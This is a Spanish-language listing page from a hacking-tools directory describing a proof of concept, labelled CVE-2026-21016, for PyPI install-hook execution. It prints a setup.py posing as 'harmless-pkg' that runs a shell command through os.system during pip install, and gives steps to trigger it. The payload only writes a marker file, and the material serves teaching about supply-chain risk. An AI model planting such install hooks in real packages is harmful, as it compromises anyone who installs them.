Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — Demuestra cómo un paquete Python malicioso ejecuta comandos arbitrarios durante pip install mediante setup.py, destacando los riesgos de la cadena de suministro de PyPI y el typosquatting. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
ExplotaciónSeguridad de Cadena de SuministroAprendizaje y EducaciónDesarrollo de PayloadsAtaque Adversario
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

Demuestra cómo un paquete Python malicioso ejecuta comandos arbitrarios durante pip install mediante setup.py, destacando los riesgos de la cadena de suministro de PyPI y el typosquatting.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 16 díasAún no revisado

CVE-2026-21016 – Hook malicioso de instalación de paquetes PyPI (ejecución de setup.py)

Código del programa (Python)

root@kitploit:~
# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – Hook malicioso de instalación de paquetes PyPI (setup.py)

Severity: Critical

Resumen

Un paquete de PyPI puede incluir código arbitrario en su setup.py, que se ejecuta durante pip install. Un atacante puede publicar un paquete con un nombre similar al de uno popular (typosquatting) y, al instalarse, el payload se ejecuta con los privilegios del usuario, lo que conduce a una ejecución remota de código.

Detalles de la vulnerabilidad

  • Tipo: Ataque a la cadena de suministro / Ejecución de código
  • Impacto: Compromiso del sistema, robo de credenciales.
  • Causa raíz: Pip ejecuta setup.py sin sandboxing, lo que otorga a los paquetes acceso completo.

Demostración del exploit

  1. Cree el directorio del paquete malicioso con el setup.py proporcionado.
  2. Instálelo localmente:
    root@kitploit:~
    pip install ./harmless-pkg
    
    
  3. Compruebe la salida:
    root@kitploit:~
    cat /tmp/pwned_by_package
    

Se ejecutó el comando id.

Descargar herramienta